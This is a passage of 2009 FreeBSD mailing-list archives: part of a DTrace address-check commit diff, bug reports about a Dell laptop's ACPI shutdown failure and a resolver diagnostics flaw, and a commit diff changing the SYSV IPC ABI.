+579,7 @@ dtrace_fuword8(void *uaddr) uint16_t dtrace_fuword16(void *uaddr) { - if ((uintptr_t)uaddr >= kernelbase) { + if ((uintptr_t)uaddr > VM_MAXUSER_ADDRESS) { DTRACE_CPUFLAG_SET(CPU_DTRACE_BADADDR); cpu_core[curcpu].cpuc_dtrace_illval = (uintptr_t)uaddr; return (0); @@ -592,7 +590,7 @@ dtrace_fuword16(void *uaddr) uint32_t dtrace_fuword32(void *uaddr) { - if ((uintptr_t)uaddr >= kernelbase) { + if ((uintptr_t)uaddr > VM_MAXUSER_ADDRESS) { DTRACE_CPUFLAG_SET(CPU_DTRACE_BADADDR); cpu_core[curcpu].cpuc_dtrace_illval = (uintptr_t)uaddr; return (0); @@ -603,7 +601,7 @@ dtrace_fuword32(void *uaddr) uint64_t dtrace_fuword64(void *uaddr) { - if ((uintptr_t)uaddr >= kernelbase) { + if ((uintptr_t)uaddr > VM_MAXUSER_ADDRESS) { DTRACE_CPUFLAG_SET(CPU_DTRACE_BADADDR); cpu_core[curcpu].cpuc_dtrace_illval = (uintptr_t)uaddr; return (0); Modified: head/sys/cddl/dev/dtrace/amd64/dtrace_subr.c ============================================================================== --- head/sys/cddl/dev/dtrace/amd64/dtrace_subr.c Wed Jun 24 15:48:20 2009 (r194849) +++ head/sys/cddl/dev/dtrace/amd64/dtrace_subr.c Wed Jun 24 16:03:57 2009 (r194850) @@ -40,7 +40,6 @@ #include #include -extern uintptr_t kernelbase; extern uintptr_t dtrace_in_probe_addr; extern int dtrace_in_probe; _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 17:10:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 37653106567C for ; Wed, 24 Jun 2009 17:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id F3BED8FC1F for ; Wed, 24 Jun 2009 17:10:02 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OHA2eq006531 for ; Wed, 24 Jun 2009 17:10:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5OHA2Au006530; Wed, 24 Jun 2009 17:10:02 GMT (envelope-from gnats) Resent-Date: Wed, 24 Jun 2009 17:10:02 GMT Resent-Message-Id: <200906241710.n5OHA2Au006530@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Dan Burkland Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 04EE71065672 for ; Wed, 24 Jun 2009 17:05:42 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id D9D268FC1F for ; Wed, 24 Jun 2009 17:05:41 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OH5fb3071728 for ; Wed, 24 Jun 2009 17:05:41 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5OH5fWG071727; Wed, 24 Jun 2009 17:05:41 GMT (envelope-from nobody) Message-Id: <200906241705.n5OH5fWG071727@www.freebsd.org> Date: Wed, 24 Jun 2009 17:05:41 GMT From: Dan Burkland To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/136008: Dell Vostro 1310 will not shutdown (Requires user intervention) X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 17:10:04 -0000 >Number: 136008 >Category: misc >Synopsis: Dell Vostro 1310 will not shutdown (Requires user intervention) >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 24 17:10:02 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Dan Burkland >Release: Issue occurs on 7.1, RELEASE, 7.2 RELASE & STABLE, & 8-Current (tried i386 & amd64 versions of each release) >Organization: >Environment: FreeBSD bsdcurrent.localdomain 8.0-CURRENT-200906 FreeBSD 8.0-CURRENT-200906 #0: Sun Jun 7 10:31:30 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 >Description: I am able to successfully install FreeBSD 7.1,7.2,& Current (both i386 & AMD64) without any problems. However when I issue a "shutdown -p now" to power off the machine it fails to power off and it requests that I press a key to reboot it. Directly proceeding the "shutdown -p now" command I receive several error messages on my console: "acpi_ec0: EcRead: failed waiting to get data ACPI Exception: AE_NO_HARDWARE_RESPONSE, Returned by Handler for [EmbeddedControl] 20090521 evregion-531 ACPI Error (psparse-0633): Method parse/execution failed [\PTS] (MOde 0xffffff000253ac0), AE_NO_HARDWARE_REPONSE acpi0: AcpiEnterSleepStatePrep failed - AE_NO_HARDWARE_RESPONSE The operating system has halted. Please press any key to reboot" I have tried disabling ACPI which prevents my machine from booting. 1) A Dmesg with boot-v can be found here: http://jperzel.net/vostro1310/current/dmesgwith-v.log 2) A Dmesg with boot-v and ACPI disabled could not be provided due to my machine not booting when ACPI was disabled. 3) Output from sysctl hw.acpi can be found here: http://jperzel.net/vostro1310/current/sysctlhwacpi.log 4) An ACPIDUMP can be found here: http://jperzel.net/vostro1310/current/dburkland-DellVostro1310.asl I also have made both forum & and mailing (freebsd-acpi with the title "Dell Vostro 1310") posts if you would like what others have said about this problem. I will be more than happy to provide you with any other information you may need. >How-To-Repeat: Shutdown -p now or halt -p >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 17:44:39 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 6BAC7106566C; Wed, 24 Jun 2009 17:44:39 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 40CB38FC18; Wed, 24 Jun 2009 17:44:39 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OHid3u037611; Wed, 24 Jun 2009 17:44:39 GMT (envelope-from linimon@freefall.freebsd.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5OHidnh037607; Wed, 24 Jun 2009 17:44:39 GMT (envelope-from linimon) Date: Wed, 24 Jun 2009 17:44:39 GMT Message-Id: <200906241744.n5OHidnh037607@freefall.freebsd.org> To: linimon@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-acpi@FreeBSD.org From: linimon@FreeBSD.org Cc: Subject: Re: i386/136008: [acpi] Dell Vostro 1310 will not shutdown (Requires user intervention) X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 17:44:39 -0000 Old Synopsis: Dell Vostro 1310 will not shutdown (Requires user intervention) New Synopsis: [acpi] Dell Vostro 1310 will not shutdown (Requires user intervention) Responsible-Changed-From-To: freebsd-bugs->freebsd-acpi Responsible-Changed-By: linimon Responsible-Changed-When: Wed Jun 24 17:43:59 UTC 2009 Responsible-Changed-Why: Sounds like an ACPI problem. http://www.freebsd.org/cgi/query-pr.cgi?pr=136008 From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 19:30:05 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id CF5F61065677 for ; Wed, 24 Jun 2009 19:30:05 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id A1D4C8FC1F for ; Wed, 24 Jun 2009 19:30:05 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OJU5ed012352 for ; Wed, 24 Jun 2009 19:30:05 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5OJU5Wh012351; Wed, 24 Jun 2009 19:30:05 GMT (envelope-from gnats) Resent-Date: Wed, 24 Jun 2009 19:30:05 GMT Resent-Message-Id: <200906241930.n5OJU5Wh012351@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Libor Forst Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 74C79106572F for ; Wed, 24 Jun 2009 19:25:54 +0000 (UTC) (envelope-from forst@betynka.ms.mff.cuni.cz) Received: from smtp1.ms.mff.cuni.cz (smtp1.ms.mff.cuni.cz [IPv6:2001:718:1e03:801::4]) by mx1.freebsd.org (Postfix) with ESMTP id 01DBB8FC18 for ; Wed, 24 Jun 2009 19:25:53 +0000 (UTC) (envelope-from forst@betynka.ms.mff.cuni.cz) Received: from kernun-e.ms.mff.cuni.cz (kernun-e.ms.mff.cuni.cz [195.113.19.101]) by smtp1.ms.mff.cuni.cz (8.14.3/8.14.3) with ESMTP id n5OJPoRt087499; Wed, 24 Jun 2009 21:25:51 +0200 (CEST) (envelope-from forst@betynka.ms.mff.cuni.cz) Received: from betynka.ms.mff.cuni.cz (betynka.ms.mff.cuni.cz [195.113.19.78]) by kernun-e.ms.mff.cuni.cz with ESMTP id 4KGJS0400018OYQ0AFB; Wed, 24 Jun 2009 21:14:09 +0200 (CEST) Received: from betynka.ms.mff.cuni.cz (localhost [127.0.0.1]) by betynka.ms.mff.cuni.cz (8.14.3/8.14.2) with ESMTP id n5OJPnUs043190 for ; Wed, 24 Jun 2009 21:25:49 +0200 (CEST) (envelope-from forst@betynka.ms.mff.cuni.cz) Received: (from forst@localhost) by betynka.ms.mff.cuni.cz (8.14.3/8.14.3/Submit) id n5OJPnJF043189; Wed, 24 Jun 2009 21:25:49 +0200 (CEST) (envelope-from forst) Message-Id: <200906241925.n5OJPnJF043189@betynka.ms.mff.cuni.cz> Date: Wed, 24 Jun 2009 21:25:49 +0200 (CEST) From: Libor Forst To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: Subject: kern/136013: Resolver wrong diagnostics X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Libor Forst List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 19:30:06 -0000 >Number: 136013 >Category: kern >Synopsis: Resolver wrong diagnostics >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 24 19:30:04 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Libor Forst >Release: FreeBSD 7.1-RELEASE-p5 i386 >Organization: Charles University, Prague >Environment: System: FreeBSD betynka.ms.mff.cuni.cz 7.1-RELEASE-p5 FreeBSD 7.1-RELEASE-p5 #0: Fri May 29 11:44:20 CEST 2009 root@kernun-e.ms.mff.cuni.cz:/usr/obj/usr/src/sys/YQ-MINIMAL i386 >Description: The res_searchN() function makes a decision about loop continuation after returning from the res_querydomainN() call based on two pieces of information: res->res_h_errno and hp->rcode. However, if the query was made for both A and AAAA RRs, the hp address points just to the first res_target structure, but the res->res_h_errno will be set by the result of the second query. Thus, res->res_h_errno and hp->rcode can be inconsistent. >How-To-Repeat: At least two-domains search-list, query for a name without dots, the first (A) response should be NXDomain, the second (AAAA) should be ServFail. In this situation, the first res_querydomainN() call (for the NAME.DOMAIN1) returns with res->res_h_errno == TRY_AGAIN (according to the second query) but hp->rcode == NXDomain (because hp reflects the first res_target). As such, the second domain will not be tried (in spite of that in all three other combinations of results, the domain is tried). >Fix: 1. Both pieces of information (h_errno and rcode) must be consistent. I.e. the rcode should be saved e.g. into res_state structure (as a new res_rcode member?). 2. The question is, whether the result (h_errno+rcode) should really be defined as "last query result". Why the responses NXDomain (A) and ServFail (AAAA) bring a different behavior than the case of ServFail (A) and NXDomain (AAAA)? Maybe the final result selection should not follow "the last" response but "the most relevant" one. >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 21:20:06 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D1E251065670 for ; Wed, 24 Jun 2009 21:20:06 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id BEEE78FC0C for ; Wed, 24 Jun 2009 21:20:06 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5OLK6Jp096724 for ; Wed, 24 Jun 2009 21:20:06 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5OLK6at096723; Wed, 24 Jun 2009 21:20:06 GMT (envelope-from gnats) Date: Wed, 24 Jun 2009 21:20:06 GMT Message-Id: <200906242120.n5OLK6at096723@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: bin/129855: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 24 Jun 2009 21:20:07 -0000 The following reply was made to PR bin/129855; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: bin/129855: commit references a PR Date: Wed, 24 Jun 2009 21:11:11 +0000 (UTC) Author: jhb Date: Wed Jun 24 21:10:52 2009 New Revision: 194910 URL: http://svn.freebsd.org/changeset/base/194910 Log: Change the ABI of some of the structures used by the SYSV IPC API: - The uid/cuid members of struct ipc_perm are now uid_t instead of unsigned short. - The gid/cgid members of struct ipc_perm are now gid_t instead of unsigned short. - The mode member of struct ipc_perm is now mode_t instead of unsigned short (this is merely a style bug). - The rather dubious padding fields for ABI compat with SV/I386 have been removed from struct msqid_ds and struct semid_ds. - The shm_segsz member of struct shmid_ds is now a size_t instead of an int. This removes the need for the shm_bsegsz member in struct shmid_kernel and should allow for complete support of SYSV SHM regions >= 2GB. - The shm_nattch member of struct shmid_ds is now an int instead of a short. - The shm_internal member of struct shmid_ds is now gone. The internal VM object pointer for SHM regions has been moved into struct shmid_kernel. - The existing __semctl(), msgctl(), and shmctl() system call entries are now marked COMPAT7 and new versions of those system calls which support the new ABI are now present. - The new system calls are assigned to the FBSD-1.1 version in libc. The FBSD-1.0 symbols in libc now refer to the old COMPAT7 system calls. - A simplistic framework for tagging system calls with compatibility symbol versions has been added to libc. Version tags are added to system calls by adding an appropriate __sym_compat() entry to src/lib/libc/incldue/compat.h. [1] PR: kern/16195 kern/113218 bin/129855 Reviewed by: arch@, rwatson Discussed with: kan, kib [1] Added: head/lib/libc/include/compat.h (contents, props changed) Modified: head/lib/libc/gen/Symbol.map head/lib/libc/gen/semctl.c head/lib/libc/sys/Makefile.inc head/lib/libc/sys/Symbol.map head/sys/compat/freebsd32/freebsd32_ipc.h head/sys/compat/freebsd32/freebsd32_misc.c head/sys/compat/freebsd32/syscalls.master head/sys/compat/linux/linux_ipc.c head/sys/compat/svr4/svr4_ipc.c head/sys/i386/ibcs2/ibcs2_ipc.c head/sys/kern/syscalls.master head/sys/kern/sysv_ipc.c head/sys/kern/sysv_msg.c head/sys/kern/sysv_sem.c head/sys/kern/sysv_shm.c head/sys/sys/ipc.h head/sys/sys/msg.h head/sys/sys/sem.h head/sys/sys/shm.h head/usr.bin/ipcs/ipcs.c Modified: head/lib/libc/gen/Symbol.map ============================================================================== --- head/lib/libc/gen/Symbol.map Wed Jun 24 21:09:56 2009 (r194909) +++ head/lib/libc/gen/Symbol.map Wed Jun 24 21:10:52 2009 (r194910) @@ -247,7 +247,6 @@ FBSD_1.0 { sem_timedwait; sem_post; sem_getvalue; - semctl; setdomainname; sethostname; longjmperror; @@ -362,6 +361,7 @@ FBSD_1.1 { posix_spawnattr_setsigdefault; posix_spawnattr_setsigmask; posix_spawnp; + semctl; tcgetsid; tcsetsid; }; Modified: head/lib/libc/gen/semctl.c ============================================================================== --- head/lib/libc/gen/semctl.c Wed Jun 24 21:09:56 2009 (r194909) +++ head/lib/libc/gen/semctl.c Wed Jun 24 21:10:52 2009 (r194910) @@ -29,15 +29,19 @@ #include __FBSDID("$FreeBSD$"); +#define _WANT_SEMUN_OLD + #include #include #include #include #include -extern int __semctl(int semid, int semnum, int cmd, union semun *arg); +int __semctl(int semid, int semnum, int cmd, union semun *arg); +int freebsd7___semctl(int semid, int semnum, int cmd, union semun_old *arg); -int semctl(int semid, int semnum, int cmd, ...) +int +semctl(int semid, int semnum, int cmd, ...) { va_list ap; union semun semun; @@ -55,3 +59,25 @@ int semctl(int semid, int semnum, int cm return (__semctl(semid, semnum, cmd, semun_ptr)); } + +int +freebsd7_semctl(int semid, int semnum, int cmd, ...) +{ + va_list ap; + union semun_old semun; + union semun_old *semun_ptr; + + va_start(ap, cmd); + if (cmd == IPC_SET || cmd == IPC_STAT || cmd == GETALL + || cmd == SETVAL || cmd == SETALL) { + semun = va_arg(ap, union semun_old); + semun_ptr = &semun; + } else { + semun_ptr = NULL; + } + va_end(ap); + + return (freebsd7___semctl(semid, semnum, cmd, semun_ptr)); +} + +__sym_compat(semctl, freebsd7_semctl, FBSD_1.0); Added: head/lib/libc/include/compat.h ============================================================================== --- /dev/null 00:00:00 1970 (empty, because file is newly added) +++ head/lib/libc/include/compat.h Wed Jun 24 21:10:52 2009 (r194910) @@ -0,0 +1,48 @@ +/*- + * Copyright (c) 2009 Advanced Computing Technologies LLC + * Written by: John H. Baldwin + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + * + * $FreeBSD$ + */ + +/* + * This file defines compatiblity symbol versions for old system calls. It + * is included in all generated system call files. + */ + +#ifndef __LIBC_COMPAT_H__ +#define __LIBC_COMPAT_H__ + +#define __sym_compat(sym,impl,verid) \ + .symver impl , sym @ verid + +__sym_compat(__semctl, freebsd7___semctl, FBSD_1.0); +__sym_compat(msgctl, freebsd7_msgctl, FBSD_1.0); +__sym_compat(shmctl, freebsd7_shmctl, FBSD_1.0); + +#undef __sym_compat + +#endif /* __LIBC_COMPAT_H__ */ + Modified: head/lib/libc/sys/Makefile.inc ============================================================================== --- head/lib/libc/sys/Makefile.inc Wed Jun 24 21:09:56 2009 (r194909) +++ head/lib/libc/sys/Makefile.inc Wed Jun 24 21:10:52 2009 (r194910) @@ -53,11 +53,13 @@ SYM_MAPS+= ${.CURDIR}/sys/Symbol.map CLEANFILES+= ${SASM} ${SPSEUDO} ${SASM}: - printf '#include "SYS.h"\nRSYSCALL(${.PREFIX})\n' > ${.TARGET} + printf '#include "compat.h"\n' > ${.TARGET} + printf '#include "SYS.h"\nRSYSCALL(${.PREFIX})\n' >> ${.TARGET} ${SPSEUDO}: + printf '#include "compat.h"\n' > ${.TARGET} printf '#include "SYS.h"\nPSEUDO(${.PREFIX:S/_//})\n' \ - > ${.TARGET} + >> ${.TARGET} MAN+= abort2.2 accept.2 access.2 acct.2 adjtime.2 \ aio_cancel.2 aio_error.2 aio_read.2 aio_return.2 \ Modified: head/lib/libc/sys/Symbol.map ============================================================================== --- head/lib/libc/sys/Symbol.map Wed Jun 24 21:09:56 2009 (r194909) +++ head/lib/libc/sys/Symbol.map Wed Jun 24 21:10:52 2009 (r194910) @@ -31,7 +31,6 @@ FBSD_1.0 { __mac_set_file; __mac_set_link; __mac_set_proc; - __semctl; __setugid; __syscall; __sysctl; @@ -184,7 +183,6 @@ FBSD_1.0 { modstat; mount; mprotect; - msgctl; msgget; msgrcv; msgsnd; @@ -267,7 +265,6 @@ FBSD_1.0 { shm_open; shm_unlink; shmat; - shmctl; shmdt; shmget; shmsys; @@ -332,6 +329,7 @@ FBSD_1.0 { }; FBSD_1.1 { + __semctl; closefrom; cpuset; cpuset_getid; @@ -351,10 +349,12 @@ FBSD_1.1 { mkdirat; mkfifoat; mknodat; + msgctl; openat; readlinkat; renameat; setfib; + shmctl; symlinkat; unlinkat; }; Modified: head/sys/compat/freebsd32/freebsd32_ipc.h ============================================================================== --- head/sys/compat/freebsd32/freebsd32_ipc.h Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/compat/freebsd32/freebsd32_ipc.h Wed Jun 24 21:10:52 2009 (r194910) @@ -30,11 +30,11 @@ #define _COMPAT_FREEBSD32_FREEBSD32_IPC_H_ struct ipc_perm32 { - uint16_t cuid; - uint16_t cgid; - uint16_t uid; - uint16_t gid; - uint16_t mode; + uid_t cuid; + gid_t cgid; + uid_t uid; + gid_t gid; + mode_t mode; uint16_t seq; uint32_t key; }; @@ -44,10 +44,7 @@ struct semid_ds32 { uint32_t sem_base; unsigned short sem_nsems; int32_t sem_otime; - int32_t sem_pad1; int32_t sem_ctime; - int32_t sem_pad2; - int32_t sem_pad3[4]; }; union semun32 { @@ -66,24 +63,19 @@ struct msqid_ds32 { pid_t msg_lspid; pid_t msg_lrpid; int32_t msg_stime; - int32_t msg_pad1; int32_t msg_rtime; - int32_t msg_pad2; int32_t msg_ctime; - int32_t msg_pad3; - int32_t msg_pad4[4]; }; struct shmid_ds32 { struct ipc_perm32 shm_perm; int32_t shm_segsz; - int32_t shm_lpid; - int32_t shm_cpid; - int16_t shm_nattch; + pid_t shm_lpid; + pid_t shm_cpid; + int shm_nattch; int32_t shm_atime; int32_t shm_dtime; int32_t shm_ctime; - uint32_t shm_internal; }; struct shm_info32 { @@ -103,4 +95,58 @@ struct shminfo32 { uint32_t shmall; }; +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) +struct ipc_perm32_old { + uint16_t cuid; + uint16_t cgid; + uint16_t uid; + uint16_t gid; + uint16_t mode; + uint16_t seq; + uint32_t key; +}; + +struct semid_ds32_old { + struct ipc_perm32_old sem_perm; + uint32_t sem_base; + unsigned short sem_nsems; + int32_t sem_otime; + int32_t sem_pad1; + int32_t sem_ctime; + int32_t sem_pad2; + int32_t sem_pad3[4]; +}; + +struct msqid_ds32_old { + struct ipc_perm32_old msg_perm; + uint32_t msg_first; + uint32_t msg_last; + uint32_t msg_cbytes; + uint32_t msg_qnum; + uint32_t msg_qbytes; + pid_t msg_lspid; + pid_t msg_lrpid; + int32_t msg_stime; + int32_t msg_pad1; + int32_t msg_rtime; + int32_t msg_pad2; + int32_t msg_ctime; + int32_t msg_pad3; + int32_t msg_pad4[4]; +}; + +struct shmid_ds32_old { + struct ipc_perm32_old shm_perm; + int32_t shm_segsz; + pid_t shm_lpid; + pid_t shm_cpid; + int16_t shm_nattch; + int32_t shm_atime; + int32_t shm_dtime; + int32_t shm_ctime; + uint32_t shm_internal; +}; +#endif + #endif /* !_COMPAT_FREEBSD32_FREEBSD32_IPC_H_ */ Modified: head/sys/compat/freebsd32/freebsd32_misc.c ============================================================================== --- head/sys/compat/freebsd32/freebsd32_misc.c Wed Jun 24 21:09:56 2009 (r194909) +++ head/sys/compat/freebsd32/freebsd32_misc.c Wed Jun 24 21:10:52 2009 (r194910) @@ -1353,6 +1353,35 @@ freebsd4_freebsd32_fhstatfs(struct threa } #endif +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) +static void +freebsd32_ipcperm_old_in(struct ipc_perm32_old *ip32, struct ipc_perm *ip) +{ + + CP(*ip32, *ip, cuid); + CP(*ip32, *ip, cgid); + CP(*ip32, *ip, uid); + CP(*ip32, *ip, gid); + CP(*ip32, *ip, mode); + CP(*ip32, *ip, seq); + CP(*ip32, *ip, key); +} + +static void +freebsd32_ipcperm_old_out(struct ipc_perm *ip, struct ipc_perm32_old *ip32) +{ + + CP(*ip, *ip32, cuid); + CP(*ip, *ip32, cgid); + CP(*ip, *ip32, uid); + CP(*ip, *ip32, gid); + CP(*ip, *ip32, mode); + CP(*ip, *ip32, seq); + CP(*ip, *ip32, key); +} +#endif + static void freebsd32_ipcperm_in(struct ipc_perm32 *ip32, struct ipc_perm *ip) { @@ -1383,6 +1412,8 @@ int freebsd32_semsys(struct thread *td, struct freebsd32_semsys_args *uap) { +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) switch (uap->which) { case 0: return (freebsd32_semctl(td, @@ -1390,7 +1421,85 @@ freebsd32_semsys(struct thread *td, stru default: return (semsys(td, (struct semsys_args *)uap)); } +#else + return (nosys(td, NULL)); +#endif +} + +#if defined(COMPAT_FREEBSD4) || defined(COMPAT_FREEBSD5) || \ + defined(COMPAT_FREEBSD6) || defined(COMPAT_FREEBSD7) +int +freebsd7_freebsd32_semctl(struct thread *td, + struct freebsd7_freebsd32_semctl_args *uap) +{ + struct semid_ds32_old dsbuf32; + struct semid_ds dsbuf; + union semun semun; + union semun32 arg; + register_t rval; + int error; + + switch (uap->cmd) { + case SEM_STAT: + case IPC_SET: + case IPC_STAT: + case GETALL: + case SETVAL: + case SETALL: + error = copyin(uap->arg, &arg, sizeof(arg)); + if (error) + return (error); + break; + } + + switch (uap->cmd) { + case SEM_STAT: + case IPC_STAT: + semun.buf = &dsbuf; + break; + case IPC_SET: + error = copyin(PTRIN(arg.buf), &dsbuf32, sizeof(dsbuf32)); + if (error) + return (error); + freebsd32_ipcperm_old_in(&dsbuf32.sem_perm, &dsbuf.sem_perm); + PTRIN_CP(dsbuf32, dsbuf, sem_base); + CP(dsbuf32, dsbuf, sem_nsems); + CP(dsbuf32, dsbuf, sem_otime); + CP(dsbuf32, dsbuf, sem_ctime); + semun.buf = &dsbuf; + break; + case GETALL: + case SETALL: + semun.array = PTRIN(arg.array); + break; + case SETVAL: + semun.val = arg.val; + break; + } + + error = kern_semctl(td, uap->semid, uap->semnum, uap->cmd, &semun, + &rval); + if (error) + return (error); + + switch (uap->cmd) { + case SEM_STAT: + case IPC_STAT: + bzero(&dsbuf32, sizeof(dsbuf32)); + freebsd32_ipcperm_old_out(&dsbuf.sem_perm, &dsbuf32.sem_perm); + PTROUT_CP(dsbuf, dsbuf32, sem_base); + CP(dsbuf, dsbuf32, sem_nsems); + 